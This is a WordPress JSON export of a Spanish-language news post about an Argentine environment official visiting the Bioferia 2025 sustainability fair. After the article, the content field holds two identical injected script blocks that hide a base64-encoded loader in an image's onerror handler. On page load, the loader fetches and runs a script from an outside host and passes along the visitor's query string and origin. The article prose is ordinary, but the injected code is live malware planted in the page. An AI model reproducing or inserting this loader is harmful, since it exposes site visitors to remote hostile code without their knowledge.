{"id":5069,"date":"2025-04-16T08:13:29","date_gmt":"2025-04-16T11:13:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5069"},"modified":"2025-08-13T23:35:57","modified_gmt":"2025-08-14T02:35:57","slug":"la-subsecretaria-de-ambiente-de-la-nacion-argentina-presente-en-la-bioferia-2025","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5069","title":{"rendered":"La Subsecretar\u00eda de Ambiente de la Nacion argentina presente en la Bioferia 2025"},"content":{"rendered":"\n<p><strong><em>Se trata de un evento internacional que propone el consumo responsable para cuidar el planeta.<\/em><\/strong><\/p>\n\n\n\n<p>El subsecretario de Ambiente de la Naci\u00f3n, Fernando Brom, visit\u00f3 la Bioferia 2025, el festival de sustentabilidad y regeneraci\u00f3n m\u00e1s grande de Latinoam\u00e9rica que se realiz\u00f3 los d\u00edas 4,5 y 6 de abril en el Hip\u00f3dromo de Palermo.<\/p>\n\n\n\n<p>Durante su visita, Brom recorri\u00f3 los diferentes espacios de exhibici\u00f3n y destac\u00f3: \u201cFuimos testigos de peque\u00f1as y grandes iniciativas orientadas al desarrollo sostenible y sustentable por parte de peque\u00f1os emprendedores, pymes y grandes empresas\u201d. Adem\u00e1s, felicit\u00f3 a los organizadores \u201cpor la iniciativa y la concurrencia masiva\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s, el funcionario coment\u00f3 que \u201cla econom\u00eda circular y la reducci\u00f3n de consumo a trav\u00e9s de energ\u00edas limpias son un patr\u00f3n com\u00fan de las marcas y empresas exitosas y los consumidores son cada vez m\u00e1s conscientes de sus beneficios\u201d. En ese sentido, agreg\u00f3: \u201cLa relaci\u00f3n precio-calidad reemplaza la l\u00f3gica de la b\u00fasqueda del menor precio. Por eso, la relacionalidad sustituye de manera gradual la transaccionalidad, y la cercan\u00eda del cliente y consumidor se consolida como eje estrat\u00e9gico clave para el progreso de una empresa. Esto se vio y sinti\u00f3 en esta nueva edici\u00f3n de la Bioferia\u201d.<\/p>\n\n\n\n<p>Este evento, el m\u00e1s relevante de la regi\u00f3n en la materia, cont\u00f3 con m\u00e1s de 200 stands que ofrecieron productos y servicios sostenibles, patio gastron\u00f3mico, experiencias interactivas, charlas y marcas de consumo responsable. Convoc\u00f3 a cocineros, emprendedores, pymes de triple impacto y artistas en un encuentro marcado por el compromiso con el cuidado del ambiente.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:374px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de un evento internacional que propone el consumo responsable para cuidar el planeta. El subsecretario de Ambiente de la Naci\u00f3n, Fernando Brom, visit\u00f3 la Bioferia 2025, el festival de sustentabilidad y regeneraci\u00f3n m\u00e1s grande de Latinoam\u00e9rica que se realiz\u00f3 los d\u00edas 4,5 y 6 de abril en el Hip\u00f3dromo de Palermo. Durante su [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5070,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[43],"tags":[],"class_list":{"0":"post-5069","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ambiente-naturaleza"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5069"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5069"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5069\/revisions"}],"predecessor-version":[{"id":6517,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5069\/revisions\/6517"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5070"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5069"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5069"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5069"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}